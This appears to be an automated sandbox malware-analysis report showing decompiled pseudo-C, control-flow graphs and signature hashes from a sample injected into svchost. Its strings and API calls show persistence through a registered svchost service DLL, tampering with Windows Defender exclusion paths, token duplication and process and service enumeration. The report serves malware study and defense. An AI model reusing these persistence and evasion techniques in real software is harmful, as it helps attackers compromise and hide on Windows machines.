                                                            				_v656 = _t75;
                                                            				_a24 = __rdi;
                                                            				r8d = 0;
                                                            				_v664 = _t78;
                                                            				_v648 = 0;
                                                            				if (RegQueryValueExW(??, ??, ??, ??, ??, ??) != 0) goto 0xaf54c225;
                                                            				if (_v648 == 0) goto 0xaf54c225;
                                                            				E0000022B22BAF55A828(_t55, _v640);
                                                            				if (_t75 == 0) goto 0xaf54c225;
                                                            				_v656 =  &_v648;
                                                            				_t107 =  &_v644;
                                                            				r8d = 0;
                                                            				_v664 = _t75;
                                                            				_t94 = "1"; // executed
                                                            				_t44 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
                                                            				if (_t44 != 0) goto 0xaf54c21a;
                                                            				_t45 = _v648;
                                                            				if (_t45 == 0) goto 0xaf54c21a;
                                                            				if (_v644 != 3) goto 0xaf54c21a;
                                                            				if (__rcx == 0) goto 0xaf54c225;
                                                            				 *__rcx = _t45;
                                                            				goto 0xaf54c225;
                                                            				E0000022B22BAF55A7E4( &_v648, _t75);
                                                            				RegCloseKey(??);
                                                            				_t79 = _t78;
                                                            				_t56 =  *_t100;
                                                            				_t70 = _t56 - 1;
                                                            				if (_t70 <= 0) goto 0xaf54c28f;
                                                            				 *(_t94 + _t79) =  *(_t94 + _t79) ^  *_t79 & 0x000000ff;
                                                            				if (_t70 == 0) goto 0xaf54c285;
                                                            				r8d = _t56 - 1 + 0xffffffff;
                                                            				r9d = _t94 + 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				r9d = _t107 - 1;
                                                            				 *( &_v632 + _t79) =  *( &_v632 + _t79) ^  *(_t107 + _t79) & 0x000000ff;
                                                            				if (_t70 != 0) goto 0xaf54c270;
                                                            				 *(_t94 + _t79) =  *(_t94 + _t79) ^  *(_v640 + _t79) & 0x000000ff;
                                                            				return E0000022B22BAF55A7C0( *(_v640 + _t79) & 0x000000ff, _t79, _v24 ^ _t102);
                                                            			}

























                                                            0x22baf54c109
                                                            0x22baf54c113
                                                            0x22baf54c11b
                                                            0x22baf54c128
                                                            0x22baf54c132
                                                            0x22baf54c14b
                                                            0x22baf54c156
                                                            0x22baf54c15c
                                                            0x22baf54c15f
                                                            0x22baf54c17d
                                                            0x22baf54c188
                                                            0x22baf54c18d
                                                            0x22baf54c197
                                                            0x22baf54c1a6
                                                            0x22baf54c1a9
                                                            0x22baf54c1ae
                                                            0x22baf54c1bc
                                                            0x22baf54c1c4
                                                            0x22baf54c1c8
                                                            0x22baf54c1d3
                                                            0x22baf54c1df
                                                            0x22baf54c1e4
                                                            0x22baf54c1e9
                                                            0x22baf54c1ec
                                                            0x22baf54c1f1
                                                            0x22baf54c1f8
                                                            0x22baf54c200
                                                            0x22baf54c202
                                                            0x22baf54c208
                                                            0x22baf54c20f
                                                            0x22baf54c214
                                                            0x22baf54c216
                                                            0x22baf54c218
                                                            0x22baf54c21d
                                                            0x22baf54c22a
                                                            0x22baf54c230
                                                            0x22baf54c23b
                                                            0x22baf54c245
                                                            0x22baf54c248
                                                            0x22baf54c24f
                                                            0x22baf54c255
                                                            0x22baf54c257
                                                            0x22baf54c25a
                                                            0x22baf54c265
                                                            0x22baf54c275
                                                            0x22baf54c279
                                                            0x22baf54c283
                                                            0x22baf54c28c
                                                            0x22baf54c2aa

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3581893009-1865207932
                                                            • Opcode ID: 176ecf4b2d2ed51e3b65fab97b9e2840988407a2e7ca45b332da4c3537147ec5
                                                            • Instruction ID: 1ffd35dd3d39c444c2260060478d5a17ada4bebcf3fc21c8a85ff45649321189
                                                            • Opcode Fuzzy Hash: 176ecf4b2d2ed51e3b65fab97b9e2840988407a2e7ca45b332da4c3537147ec5
                                                            • Instruction Fuzzy Hash: 3041E633218A81A2EB728FA1F44D3DE77A1F785784F445225EACA47B5ADF39C505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Token$CloseHandleProcess$CurrentDuplicateInformationOpen
                                                            • String ID:
                                                            • API String ID: 3042581256-0
                                                            • Opcode ID: 6359db43e77064e405f4415af4b66f58b51b3cbb6850ad2b13ffff9c0d2738e8
                                                            • Instruction ID: b1b4f2d92108d2dbca764e4fcb99f663ed9f290670614e16a621ecf03512dad3
                                                            • Opcode Fuzzy Hash: 6359db43e77064e405f4415af4b66f58b51b3cbb6850ad2b13ffff9c0d2738e8
                                                            • Instruction Fuzzy Hash: 8D112933608B81A2EB218F91F44C78AB7A1F7C0B99F404015DA8947A69DFBEC049CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 592884611-0
                                                            • Opcode ID: f8e94aababa1d42a823a31684b0824b013978815464b1e91387632cdba9d0864
                                                            • Instruction ID: 97ba4fef74735a14ac17fdebca33bfb49eee69993961df7442436a17d3504527
                                                            • Opcode Fuzzy Hash: f8e94aababa1d42a823a31684b0824b013978815464b1e91387632cdba9d0864
                                                            • Instruction Fuzzy Hash: BA113C33604A85A2EF31CB61F48D39A73A4F788B81F5446259A4D47719DF3DC545CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PrivilegeProcess$CheckCurrentLookupOpenTokenValue
                                                            • String ID:
                                                            • API String ID: 3991982149-0
                                                            • Opcode ID: 1c8359fc17c4000b2134039da52b37f622534ab4c7cdcb34b7ee8ba26eebee4d
                                                            • Instruction ID: 3acafc8077dee0b34049201ead822e26181af3147a2669349bac4cb88888682b
                                                            • Opcode Fuzzy Hash: 1c8359fc17c4000b2134039da52b37f622534ab4c7cdcb34b7ee8ba26eebee4d
                                                            • Instruction Fuzzy Hash: 30110A72229B8496EB648F90F44929AB7B0F388758F401019FA8E47B59DF7DD144CF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                            • String ID:
                                                            • API String ID: 4201418100-0
                                                            • Opcode ID: 1210be82f61195dc78fd122f99fa871274a3fff703f060ebbf6fd243cd5f5361
                                                            • Instruction ID: 30cda81c371da4df9fd28e2d8b74d343b2eb1f641fc39da4dfb03fc2d0c8715b
                                                            • Opcode Fuzzy Hash: 1210be82f61195dc78fd122f99fa871274a3fff703f060ebbf6fd243cd5f5361
                                                            • Instruction Fuzzy Hash: 3FE0EC22A10601F3EB2A6BA2DC9D3993352E799716F814925C106856AACF2E85898601
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF56ED24(intOrPtr* __rax, void* __rcx) {
                                                            				int _t1;
                                                            				intOrPtr _t4;
                                                            				void* _t10;
                                                            				intOrPtr _t14;
                                                            
                                                            				if (__rcx == 0) goto 0xaf56ed60;
                                                            				_t14 =  *0xaf599788; // 0x22baed00000, executed
                                                            				_t1 = HeapFree(_t10, ??); // executed
                                                            				if (_t1 != 0) goto 0xaf56ed5b;
                                                            				E0000022B22BAF567054(__rax);
                                                            				_t4 = E0000022B22BAF566F9C(GetLastError(), __rax, _t14, __rcx);
                                                            				 *__rax = _t4;
                                                            				return _t4;
                                                            			}







                                                            0x22baf56ed27
                                                            0x22baf56ed33
                                                            0x22baf56ed3a
                                                            0x22baf56ed42
                                                            0x22baf56ed44
                                                            0x22baf56ed54
                                                            0x22baf56ed59
                                                            0x22baf56ed60

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 141e3d82385d6fa18b4560c9f8b502fa2d773691cc595bbadd310f7f2727746f
                                                            • Instruction ID: e2edbc41237ee345e3dfc79a3d24059500bf77cbac1ce8ced300c179a7bcbe46
                                                            • Opcode Fuzzy Hash: 141e3d82385d6fa18b4560c9f8b502fa2d773691cc595bbadd310f7f2727746f
                                                            • Instruction Fuzzy Hash: EFE08662712105B3FF7A6BF3948C3E873919B44780F080424992547297EF3A44814204
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 58%
                                                            			E0000022B22BAF5310D0() {
                                                            				void* _t10;
                                                            				signed long long _t12;
                                                            				signed long long _t13;
                                                            				signed long long _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            
                                                            				_t20 = _t19 - 0x30;
                                                            				_t18 = _t20 + 0x20;
                                                            				_t12 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t13 = _t12 ^ _t18;
                                                            				 *_t18 = _t13;
                                                            				__imp__#115(); // executed
                                                            				 *0xaf599e84 =  *((intOrPtr*)(_t20 - _t13 + 0x20));
                                                            				E0000022B22BAF55AC28(_t10, _t13);
                                                            				return E0000022B22BAF55A7C0(0x202, _t13,  *_t18 ^ _t18);
                                                            			}









                                                            0x22baf5310d2
                                                            0x22baf5310d6
                                                            0x22baf5310db
                                                            0x22baf5310e2
                                                            0x22baf5310e5
                                                            0x22baf531100
                                                            0x22baf53110d
                                                            0x22baf531113
                                                            0x22baf531129

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Startup_onexit
                                                            • String ID:
                                                            • API String ID: 3012808385-0
                                                            • Opcode ID: 1f1975418b18153ffd42a2bf71cf3ef0b2b739cee56a3fbbc5a583c72f8ace5f
                                                            • Instruction ID: fad5be03e056585480f8198ca43477b92fbd5fec88e92825eb4cb02022daee67
                                                            • Opcode Fuzzy Hash: 1f1975418b18153ffd42a2bf71cf3ef0b2b739cee56a3fbbc5a583c72f8ace5f
                                                            • Instruction Fuzzy Hash: 04F0F876211A84EBEB22EFA4E85D2D873A4F748704F848412A98D4776ADF39C215CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.790579289.0000022BAF470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf470000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                            • Instruction ID: 5adb3552c8b64d4553b07a026c780a20759e30d106001a2b3cffbc0e9f8c7e51
                                                            • Opcode Fuzzy Hash: 9869b97ec70a38c37ede3072b41e1068fb460917c8c4f50d93b484b6020e7d47
                                                            • Instruction Fuzzy Hash: 7B31F53260CB485FEB49EB6C940D7AABBD1FB94320F04055EE48AD3286DF64ED0187C1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 372 22baf54cf80-22baf54d000 call 22baf563830 RegOpenKeyExW 375 22baf54d002-22baf54d047 RegQueryValueExW RegCloseKey 372->375 376 22baf54d049-22baf54d05c call 22baf563830 372->376 375->376 377 22baf54d060-22baf54d0ca lstrlenW wsprintfW call 22baf549b50 375->377 376->377 382 22baf54d0cc-22baf54d0df 377->382 383 22baf54d0f3-22baf54d145 wsprintfW * 2 RegOpenKeyExW 377->383 384 22baf54d0f0 382->384 385 22baf54d0e1-22baf54d0e5 382->385 386 22baf54d147-22baf54d15d RegCloseKey SHDeleteKeyW 383->386 387 22baf54d163-22baf54d1a1 RegCreateKeyExW 383->387 384->383 388 22baf54d0eb-22baf54d0ee 385->388 389 22baf54d0e7-22baf54d0e9 385->389 386->387 390 22baf54d1a7-22baf54d1e9 RegSetValueExW RegCloseKey 387->390 391 22baf54d7b6 387->391 388->383 389->383 390->391 393 22baf54d1ef-22baf54d22d RegCreateKeyExW 390->393 392 22baf54d7b8-22baf54d7de call 22baf55a7c0 391->392 393->391 395 22baf54d233-22baf54d275 RegSetValueExW RegCloseKey 393->395 395->391 397 22baf54d27b-22baf54d2b9 RegCreateKeyExW 395->397 397->391 398 22baf54d2bf-22baf54d301 RegSetValueExW RegCloseKey 397->398 398->391 399 22baf54d307-22baf54d345 RegCreateKeyExW 398->399 399->391 400 22baf54d34b-22baf54d357 399->400 401 22baf54d360-22baf54d369 400->401 401->401 402 22baf54d36b-22baf54d3ad RegSetValueExW RegCloseKey 401->402 402->391 403 22baf54d3b3-22baf54d3f1 RegCreateKeyExW 402->403 403->391 404 22baf54d3f7-22baf54d438 RegSetValueExW RegCloseKey 403->404 404->391 405 22baf54d43e-22baf54d47c RegCreateKeyExW 404->405 405->391 406 22baf54d482-22baf54d48a 405->406 407 22baf54d490-22baf54d499 406->407 407->407 408 22baf54d49b-22baf54d4dd RegSetValueExW RegCloseKey 407->408 408->391 409 22baf54d4e3-22baf54d521 RegCreateKeyExW 408->409 409->391 410 22baf54d527-22baf54d56b RegSetValueExW RegCloseKey 409->410 410->391 411 22baf54d571-22baf54d5c5 wsprintfW RegCreateKeyExW 410->411 411->391 412 22baf54d5cb-22baf54d5d2 411->412 413 22baf54d5d5-22baf54d5de 412->413 413->413 414 22baf54d5e0-22baf54d627 RegSetValueExW RegCloseKey 413->414 414->391 415 22baf54d62d-22baf54d66e RegCreateKeyExW 414->415 415->391 416 22baf54d674-22baf54d679 415->416 417 22baf54d680-22baf54d689 416->417 417->417 418 22baf54d68b-22baf54d6d0 RegSetValueExW RegCloseKey 417->418 418->391 419 22baf54d6d6 418->419 420 22baf54d6dd call 22baf54ce70 419->420 421 22baf54d6e2-22baf54d6e4 420->421 421->391 422 22baf54d6ea-22baf54d740 call 22baf563214 RegCreateKeyExW 421->422 425 22baf54d742-22baf54d776 RegSetValueExW RegCloseKey 422->425 426 22baf54d77c-22baf54d780 422->426 425->426 427 22baf54d782-22baf54d7ab wsprintfW SHDeleteKeyW 426->427 428 22baf54d7b1-22baf54d7b4 426->428 427->428 428->392
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$Value$Create$wsprintf$DeleteOpen$Querylstrlen
                                                            • String ID: $%SystemRoot%\System32\svchost.exe -k AppService$.tmp$?$AppService$AppService%c$Description$DisplayName$ErrorControl$ImagePath$LoaderDll%d$LocalSystem$ObjectName$SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$Start$Type
                                                            • API String ID: 499743384-2617351667
                                                            • Opcode ID: 960aca078e9da884603cc79a8df186a3e70386ff5267fb80081fb0fe69ed83bf
                                                            • Instruction ID: 15ea783beb340527513d95bfffb4b3238565ca28b509cad291b3d1e563618299
                                                            • Opcode Fuzzy Hash: 960aca078e9da884603cc79a8df186a3e70386ff5267fb80081fb0fe69ed83bf
                                                            • Instruction Fuzzy Hash: 55329173214B95A6EB21CFA4F48C78AB7A4F784B98F400215EB9907F59DF7AC109CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 429 22baf545fd0-22baf546021 OpenSCManagerW 430 22baf546023-22baf546069 EnumServicesStatusExW 429->430 431 22baf546074-22baf546076 429->431 432 22baf54607b-22baf5460a8 LocalAlloc 430->432 433 22baf54606b-22baf54606e CloseServiceHandle 430->433 434 22baf5467e9-22baf546803 call 22baf55a7c0 431->434 435 22baf5460b7-22baf5460fa EnumServicesStatusExW 432->435 436 22baf5460aa-22baf5460b2 CloseServiceHandle 432->436 433->431 439 22baf5460fc-22baf546110 CloseServiceHandle LocalFree 435->439 440 22baf546115-22baf54619c LocalAlloc * 3 call 22baf563830 435->440 438 22baf5467d9-22baf5467e1 436->438 438->434 439->438 444 22baf5461a2-22baf5461a9 440->444 445 22baf546784-22baf5467d1 LocalReAlloc LocalFree * 3 CloseServiceHandle 440->445 446 22baf5461b0-22baf5461ed OpenServiceW 444->446 445->438 447 22baf546299-22baf54631e call 22baf563830 * 2 wsprintfW call 22baf563830 RegOpenKeyExW 446->447 448 22baf5461f3-22baf54620c QueryServiceConfigW 446->448 459 22baf546320-22baf546365 RegQueryValueExW RegCloseKey 447->459 460 22baf54638d-22baf546394 447->460 449 22baf54625d-22baf546283 QueryServiceConfig2W 448->449 450 22baf54620e-22baf546259 448->450 452 22baf546290-22baf546293 CloseServiceHandle 449->452 453 22baf546285-22baf54628c 449->453 450->449 452->447 453->452 459->460 461 22baf546367-22baf54636b 459->461 462 22baf5463f5 460->462 463 22baf546396-22baf5463a1 460->463 461->460 467 22baf54636d-22baf54638b ExpandEnvironmentStringsW 461->467 466 22baf5463f9-22baf5464c6 call 22baf5495d0 lstrlenW * 11 LocalSize 462->466 464 22baf5463cb 463->464 465 22baf5463a3 463->465 469 22baf5463d1-22baf5463d8 464->469 468 22baf5463a7-22baf5463ad 465->468 477 22baf5464e1-22baf54677e lstrlenW call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW * 2 call 22baf562ba0 lstrlenW 466->477 478 22baf5464c8-22baf5464dc LocalReAlloc 466->478 467->466 471 22baf5463af-22baf5463b3 468->471 472 22baf5463f0 468->472 469->472 473 22baf5463da-22baf5463ec 469->473 471->472 475 22baf5463b5-22baf5463c7 471->475 472->462 473->469 476 22baf5463ee 473->476 475->468 480 22baf5463c9 475->480 476->462 477->445 477->446 478->477 480->462
                                                            C-Code - Quality: 45%
                                                            			E0000022B22BAF545FD0(void* __rdx, long long __rdi, long long __rsi, long long __r12, long long __r14, long long __r15) {
                                                            				void* __rbp;
                                                            				intOrPtr _t286;
                                                            				signed int _t321;
                                                            				signed short _t347;
                                                            				void* _t350;
                                                            				void* _t367;
                                                            				signed long long _t394;
                                                            				signed long long _t395;
                                                            				signed long long _t398;
                                                            				signed long long _t401;
                                                            				intOrPtr _t402;
                                                            				intOrPtr _t403;
                                                            				signed long long _t410;
                                                            				signed long long _t411;
                                                            				signed long long _t412;
                                                            				signed long long _t418;
                                                            				intOrPtr _t430;
                                                            				void* _t469;
                                                            				void* _t475;
                                                            				signed long long _t513;
                                                            				signed long long _t523;
                                                            				signed long long _t527;
                                                            				intOrPtr* _t536;
                                                            				intOrPtr* _t537;
                                                            				void* _t540;
                                                            				void* _t541;
                                                            				signed long long _t542;
                                                            				void* _t544;
                                                            				signed long long _t563;
                                                            				signed long long _t565;
                                                            				signed long long _t575;
                                                            
                                                            				_t499 = __rdx;
                                                            				_t540 = _t541 - 0xc30;
                                                            				_t542 = _t541 - 0xd30;
                                                            				_t394 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t395 = _t394 ^ _t542;
                                                            				 *(_t540 + 0xc10) = _t395;
                                                            				r13d = 0;
                                                            				 *((intOrPtr*)(_t542 + 0x5c)) = r13d;
                                                            				r8d = 0xf003f;
                                                            				 *((intOrPtr*)(_t542 + 0x54)) = r13d;
                                                            				 *((intOrPtr*)(_t542 + 0x58)) = r13d;
                                                            				OpenSCManagerW(??, ??, ??);
                                                            				 *(_t540 - 0x68) = _t395;
                                                            				if (_t395 == 0) goto 0xaf546074;
                                                            				 *(_t542 + 0x48) = _t565;
                                                            				 *((long long*)(_t542 + 0x40)) = _t542 + 0x58;
                                                            				_t10 = _t565 + 3; // 0x3
                                                            				r9d = _t10;
                                                            				 *((long long*)(_t542 + 0x38)) = _t542 + 0x54;
                                                            				_t13 = _t565 + 0x30; // 0x30
                                                            				r8d = _t13;
                                                            				_t398 = _t542 + 0x5c;
                                                            				 *(_t542 + 0x30) = _t398;
                                                            				 *((intOrPtr*)(_t542 + 0x28)) = r13d;
                                                            				 *(_t542 + 0x20) = _t565;
                                                            				__imp__EnumServicesStatusExW();
                                                            				if ( *((intOrPtr*)(_t542 + 0x5c)) != 0) goto 0xaf54607b;
                                                            				CloseServiceHandle(??);
                                                            				goto 0xaf5467e9;
                                                            				 *((long long*)(_t542 + 0xd50)) = __rsi;
                                                            				 *((long long*)(_t542 + 0xd58)) = __rdi;
                                                            				LocalAlloc(??, ??);
                                                            				 *(_t540 - 0x70) = _t398;
                                                            				_t523 = _t398;
                                                            				if (_t398 != 0) goto 0xaf5460b7;
                                                            				CloseServiceHandle(??);
                                                            				goto 0xaf5467d9;
                                                            				 *(_t542 + 0x48) = _t565;
                                                            				 *((long long*)(_t542 + 0x40)) = _t542 + 0x58;
                                                            				 *((intOrPtr*)(_t542 + 0x58)) = r13d;
                                                            				 *((long long*)(_t542 + 0x38)) = _t542 + 0x54;
                                                            				_t401 = _t542 + 0x5c;
                                                            				 *(_t542 + 0x30) = _t401;
                                                            				 *((intOrPtr*)(_t542 + 0x28)) = _t398 + 0x38;
                                                            				_t32 = _t499 + 3; // 0x3
                                                            				r9d = _t32;
                                                            				_t33 = _t499 + 0x30; // 0x30
                                                            				r8d = _t33;
                                                            				 *(_t542 + 0x20) = _t523;
                                                            				__imp__EnumServicesStatusExW();
                                                            				if (0 != 0) goto 0xaf546115;
                                                            				CloseServiceHandle(??);
                                                            				LocalFree(??);
                                                            				goto 0xaf5467d9;
                                                            				 *((long long*)(_t542 + 0xd60)) = __r12;
                                                            				 *((long long*)(_t542 + 0xd28)) = __r14;
                                                            				 *((long long*)(_t542 + 0xd20)) = __r15;
                                                            				LocalAlloc(??, ??);
                                                            				r14d = 1;
                                                            				 *(_t542 + 0x60) = _t401;
                                                            				 *((intOrPtr*)(_t542 + 0x50)) = r14d;
                                                            				 *_t401 = 0x87;
                                                            				LocalAlloc(??, ??);
                                                            				 *((intOrPtr*)(_t542 + 0x68)) = r13d;
                                                            				_t575 = _t401;
                                                            				LocalAlloc(??, ??);
                                                            				r8d = 0x208;
                                                            				_t563 = _t401;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 + 0x1c0, __rdx, _t523, _t544);
                                                            				 *((intOrPtr*)(_t542 + 0x74)) = r13d;
                                                            				if ( *((intOrPtr*)(_t542 + 0x54)) - r13d <= 0) goto 0xaf546784;
                                                            				 *_t563 = 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x78)) = 0xaf586058;
                                                            				_t536 = _t401 * 0x38 + _t523;
                                                            				 *((long long*)(_t540 - 0x80)) = 0xaf586058;
                                                            				r8d = 1;
                                                            				 *((intOrPtr*)(_t542 + 0x70)) = 0xffffffff;
                                                            				 *((long long*)(_t540 - 0x58)) = _t536;
                                                            				OpenServiceW(??, ??, ??);
                                                            				if (_t401 == 0) goto 0xaf546299;
                                                            				r8d = 0x2000;
                                                            				if (QueryServiceConfigW(??, ??, ??, ??) == 0) goto 0xaf54625d;
                                                            				_t430 =  *((intOrPtr*)(_t575 + 0x10));
                                                            				 *((intOrPtr*)(_t542 + 0x70)) =  *((intOrPtr*)(_t575 + 4));
                                                            				_t402 =  *((intOrPtr*)(_t575 + 0x18));
                                                            				_t572 =  !=  ? _t430 : 0xaf586058;
                                                            				_t568 =  !=  ? _t402 : 0xaf586058;
                                                            				_t403 =  *((intOrPtr*)(_t575 + 0x28));
                                                            				_t525 =  !=  ? _t403 : 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x78)) =  !=  ? _t403 : 0xaf586058;
                                                            				_t527 =  !=  ?  *((intOrPtr*)(_t575 + 0x30)) : 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x80)) = 0xaf586058;
                                                            				r9d = 0x2000;
                                                            				 *(_t542 + 0x20) = _t542 + 0x68;
                                                            				__imp__QueryServiceConfig2W();
                                                            				if ( *_t563 != 0) goto 0xaf546290;
                                                            				 *_t563 = 0xaf586058;
                                                            				CloseServiceHandle(??);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 + 0x1c0, 0xaf586058, _t527, _t563);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 - 0x50, 0xaf586058, _t527, _t563);
                                                            				wsprintfW(??, ??);
                                                            				 *((intOrPtr*)(_t542 + 0x6c)) = 0x104;
                                                            				r8d = 0x104;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 - 0x50, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", _t527,  *_t536);
                                                            				r9d = 0x20119;
                                                            				 *(_t542 + 0x20) = _t542 + 0x78;
                                                            				r8d = 0;
                                                            				 *(_t542 + 0x78) = _t527;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54638d;
                                                            				 *((long long*)(_t542 + 0x28)) = _t542 + 0x6c;
                                                            				r8d = 0;
                                                            				 *(_t542 + 0x20) = _t540 - 0x50;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t294 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t382 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54638d;
                                                            				if ( *((intOrPtr*)(_t542 + 0x6c)) <= 0) goto 0xaf54638d;
                                                            				r8d = 0x104;
                                                            				ExpandEnvironmentStringsW(??, ??, ??);
                                                            				goto 0xaf5463f9;
                                                            				 *((short*)(_t540 - 0x50)) = 0;
                                                            				if (0xaf586058 == 0) goto 0xaf5463f5;
                                                            				_t410 = _t527;
                                                            				if ( *0xaf586058 != 0x22) goto 0xaf5463cb;
                                                            				_t321 =  *0x22BAF58605A & 0x0000ffff;
                                                            				if (_t321 == 0) goto 0xaf5463f0;
                                                            				if (_t321 == 0x22) goto 0xaf5463f0;
                                                            				 *(_t540 + _t410 * 2 - 0x50) = _t321;
                                                            				_t411 = _t410 + 1;
                                                            				if (_t411 - 0x208 < 0) goto 0xaf5463a7;
                                                            				goto 0xaf5463f5;
                                                            				r8d = 0xffdf;
                                                            				_t347 =  *0xaf586058 & 0x0000ffff;
                                                            				if ((r8w & _t347) == 0) goto 0xaf5463f0;
                                                            				 *(_t540 + _t411 * 2 - 0x50) = _t347;
                                                            				_t412 = _t411 + 1;
                                                            				if (_t412 - 0x208 < 0) goto 0xaf5463d1;
                                                            				goto 0xaf5463f5;
                                                            				 *((short*)(_t540 + _t412 * 2 - 0x50)) = 0;
                                                            				E0000022B22BAF5495D0(_t540 - 0x50, _t540 + 0x3d0, _t540, _t540 + 0x5e0, _t540 + 0x7f0, _t563);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				_t529 =  *((intOrPtr*)(_t540 - 0x78));
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
